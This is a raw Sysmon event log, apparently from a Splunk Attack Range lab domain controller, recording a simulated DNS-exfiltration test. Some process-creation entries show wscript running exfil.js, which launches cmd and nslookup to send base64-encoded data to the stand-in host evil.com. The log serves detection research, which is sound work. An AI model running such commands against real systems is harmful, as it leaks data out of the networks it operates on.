14:16:18.201{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhs.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000196847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.481{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52373- 354300x8000000000000000196846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.481{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52372- 354300x8000000000000000196845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.481{00000000-0000-0000-0000-000000000000}5776<unknown process>-udptruefalse127.0.0.1-52372-false127.0.0.1-53domain 354300x8000000000000000196844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.315{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52371- 354300x8000000000000000196843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.315{00000000-0000-0000-0000-000000000000}4100<unknown process>-udptruefalse127.0.0.1-52371-false127.0.0.1-53domain 354300x8000000000000000196842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.177{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52370- 354300x8000000000000000196841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.177{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52369- 354300x8000000000000000196840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.173{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52368- 354300x8000000000000000196839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.173{00000000-0000-0000-0000-000000000000}6508<unknown process>-udptruefalse127.0.0.1-52368-false127.0.0.1-53domain 354300x8000000000000000196838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.019{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52367- 354300x8000000000000000196837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.018{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52366- 354300x8000000000000000196836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.018{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52365- 354300x8000000000000000196835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.018{00000000-0000-0000-0000-000000000000}5436<unknown process>-udptruefalse127.0.0.1-52365-false127.0.0.1-53domain 354300x8000000000000000196834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.866{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52364- 354300x8000000000000000196833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.866{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52363- 354300x8000000000000000196832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.865{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52362- 354300x8000000000000000196831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.865{00000000-0000-0000-0000-000000000000}7052<unknown process>-udptruefalse127.0.0.1-52362-false127.0.0.1-53domain 354300x8000000000000000196830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.746{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52361- 354300x8000000000000000196829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.745{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52360- 354300x8000000000000000196828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.745{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52359- 354300x8000000000000000196827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.745{00000000-0000-0000-0000-000000000000}1344<unknown process>-udptruefalse127.0.0.1-52359-false127.0.0.1-53domain 354300x8000000000000000196826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52358- 354300x8000000000000000196825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52357- 10341000x8000000000000000196824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.154{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.154{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.154{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.154{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.138{2E1864BB-17B2-629A-EA3E-000000005F02}80403620C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-EB3E-000000005F02}5100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.138{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-EB3E-000000005F02}5100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.138{2E1864BB-17B2-629A-E93E-000000005F02}72527172C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-EB3E-000000005F02}5100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.144{2E1864BB-17B2-629A-EB3E-000000005F02}5100C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-E93E-000000005F02}7252C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhs.tmp 2>&1 10341000x8000000000000000196816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.100{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-EA3E-000000005F02}8040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.100{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-EA3E-000000005F02}8040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.084{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=853692EA5C299E4B62C08F2EEB41C51D,SHA256=6CC88494349AD5025808DDFD1D5429B5C736A2C507F8D0AE80C1540586B82557,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.084{2E1864BB-17B2-629A-EA3E-000000005F02}80403620C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-E93E-000000005F02}7252C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.084{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA644BD875F0BF177B0D28F4347D21C,SHA256=7E5C06F40A863CE911874237482BA62F8275C102D145EC24E6D5B3B9D410D56C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.069{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-EA3E-000000005F02}8040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-E83E-000000005F02}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-E93E-000000005F02}7252C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-17A1-629A-783D-000000005F02}55522536C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-E93E-000000005F02}7252C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.045{2E1864BB-17B2-629A-E93E-000000005F02}7252C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000196802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 